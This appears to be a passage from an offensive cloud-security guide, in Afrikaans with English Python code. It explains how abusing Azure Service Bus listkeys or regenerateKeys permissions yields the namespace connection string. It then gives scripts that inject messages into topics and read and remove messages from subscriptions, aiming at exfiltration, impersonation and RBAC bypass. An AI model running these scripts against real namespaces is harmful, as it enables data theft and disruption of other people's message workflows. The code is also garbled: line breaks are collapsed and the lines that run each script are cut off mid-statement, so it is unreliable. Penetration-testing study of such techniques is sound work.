Stuur Berigte. Aksie: Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action OF Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action
Jy kan die PrimaryConnectionString verkry, wat as 'n geloofsbrief vir die Service Bus-namespace optree. Met hierdie verbindingsstring kan jy ten volle autentiseer as die Service Bus-namespace, wat jou in staat stel om boodskappe na enige wagte of onderwerp te stuur en moontlik met die stelsel te kommunikeer op maniere wat operasies kan ontwrig, geldige gebruikers kan naboots, of kwaadwillige data in die boodskapwerkvloei kan inspuit.
#You need to install the following libraries#pip install azure-servicebus#pip install aiohttp#pip install azure-identityimport asynciofrom azure.servicebus.aio import ServiceBusClientfrom azure.servicebus import ServiceBusMessage# ConstantsNAMESPACE_CONNECTION_STR ="<PrimaryConnectionString>"TOPIC_NAME ="<TOPIC_NAME>"# Function to send a single message to a Service Bus topicasyncdefsend_individual_message(publisher):# Prepare a single message with updated contentsingle_message =ServiceBusMessage("Hacktricks-Training: Single Item")# Send the message to the topicawait publisher.send_messages(single_message)print("Sent a single message containing 'Hacktricks-Training'")# Function to send multiple messages to a Service Bus topicasyncdefsend_multiple_messages(publisher):# Generate a collection of messages with updated contentmessage_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list")for i inrange(5)]# Send the entire collection of messages to the topicawait publisher.send_messages(message_list)print("Sent a list of 5 messages containing 'Hacktricks-Training'")# Function to send a grouped batch of messages to a Service Bus topicasyncdefsend_grouped_messages(publisher):# Send a grouped batch of messages with updated contentasyncwith publisher:grouped_message_batch =await publisher.create_message_batch()for i inrange(10):try:# Append a message to the batch with updated contentgrouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}"))exceptValueError:# If batch reaches its size limit, handle by creating another batchbreak# Dispatch the batch of messages to the topicawait publisher.send_messages(grouped_message_batch)print("Sent a batch of 10 messages containing 'Hacktricks-Training'")# Main function to execute all tasksasyncdefexecute():# Instantiate the Service Bus client with the connection stringasyncwith ServiceBusClient.from_connection_string(conn_str=NAMESPACE_CONNECTION_STR,logging_enable=True)as sb_client:# Create a topic sender for dispatching messages to the topicpublisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME)asyncwith publisher:# Send a single messageawaitsend_individual_message(publisher)# Send multiple messagesawaitsend_multiple_messages(publisher)# Send a batch of messagesawaitsend_grouped_messages(publisher)# Run the asynchronous"Messages Sent")print("----------------------------")
Ontvang Berigte. Aksie: Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action OF Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action
Jy kan die PrimaryConnectionString verkry, wat as 'n geloofsbrief vir die Service Bus-namespace dien. Met hierdie verbindingsstring kan jy berigte van enige wachtrij of subskripsie binne die namespace ontvang, wat toegang tot potensieel sensitiewe of kritieke data moontlik maak, data-exfiltrasie moontlik maak, of inmeng met boodskapverwerking en toepassingswerkvloei.
#You need to install the following libraries#pip install azure-servicebus#pip install aiohttp#pip install azure-identityimport asynciofrom azure.servicebus.aio import ServiceBusClientNAMESPACE_CONNECTION_STR ="<PrimaryConnectionString>"TOPIC_NAME ="<TOPIC_NAME>"SUBSCRIPTION_NAME ="<TOPIC_SUBSCRIPTION_NAME>"#Topic Subscription# Function to receive and process messages from a Service Bus subscriptionasyncdefreceive_and_process_messages():# Create a Service Bus client using the connection stringasyncwith ServiceBusClient.from_connection_string(conn_str=NAMESPACE_CONNECTION_STR,logging_enable=True)as servicebus_client:# Get the Subscription Receiver object for the specified topic and subscriptionreceiver = servicebus_client.get_subscription_receiver(topic_name=TOPIC_NAME,subscription_name=SUBSCRIPTION_NAME,max_wait_time=5)asyncwith receiver:# Receive messages with a defined maximum wait time and countreceived_msgs =await receiver.receive_messages(max_wait_time=5,max_message_count=20)for msg in received_msgs:print("Received: "+str(msg))# Complete the message to remove it from the subscriptionawait receiver.complete_message(msg)# Run the asynchronous message processing"Message Receiving Completed")print("----------------------------")
As jy hierdie toestemmings het, kan jy voorregte opgradeer deur gedeelde toegang sleutels te lees of te skep. Hierdie sleutels stel volle beheer oor die Service Bus naamruimte in, insluitend die bestuur van rye, onderwerpe, en die stuur/ontvang van boodskappe, wat moontlik rolgebaseerde toegangbeheer (RBAC) kan omseil.